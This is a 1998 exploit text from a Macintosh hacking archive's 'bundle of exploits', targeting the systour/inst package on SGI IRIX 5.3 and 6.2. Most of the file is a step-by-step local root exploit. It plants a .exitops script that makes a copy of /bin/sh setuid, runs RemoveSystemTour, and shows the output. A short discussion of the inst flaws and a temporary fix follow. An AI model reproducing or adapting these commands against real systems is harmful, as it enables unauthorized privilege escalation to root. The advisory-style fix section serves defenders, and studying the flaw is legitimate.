home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Freaks Macintosh Archive
/
Freaks Macintosh Archive.bin
/
Freaks Macintosh Archives
/
Hacking & Misc
/
bundle of exploits.sit
/
bundle of exploits
/
sgi_systour.txt
< prev
next >
Wrap
Text File
|
1998-07-17
|
2KB
|
53 lines
PROBLEM. systour
AFFECTS. SGI IRIX 5.3 and 6.2 with the systour package available.
REQUIRED. account on server
RISK. root compromise, denial of service, etc.
---
Exploit:
First, we set up an environment for running inst. dryrun is set to true
because we are considerate environmentalists.
$ rbase=$HOME; export rbase
$ mkdir -p $HOME/var/inst
$ echo "dryrun: true" > $HOME/.swmgrrc
These three lines should be very familiar to all exploitors.
$ cp -p /bin/sh /tmp/foobar
$ printf '#\!/bin/sh\nchmod 4777 /tmp/foobar\n' > $HOME/var/inst/.exitops
$ chmod a+x $HOME/var/inst/.exitops
Now run it.
$ /usr/lib/tour/bin/RemoveSystemTour
Executing outstanding exit-commands from previous session ..
Successfully completed exit-commands from previous session.
Reading installation history
Checking dependencies
ERROR : Software Manager: automatic installation failed: New target
(nothing installed) and no distribution.
---
DISCUSSION. The easiest solution is to replace RemoveSystemTour with
a binary that checks the password. However, RemoveSystemTour may not be
the only way to access inst, and so these general recommendations apply:
inst should check UID and lock configuration options when called non-
interactively from versions and with euid 0. inst also has a race
condition on the file /tmp/shPID0, the shell script it creates to make the
appropriate directory (rbase). inst should verify the variables it
uses--by relying on an external shell script, environment variables, IFS,
etc. can be tampered with. Finally, inst will happily overwrite logfiles
specified in the .swmgrrc file and creat() the shell script over anything.
---
TEMPORARY FIX. Either remove the system tour or chmod -s the
RemoveSystemTour binary.
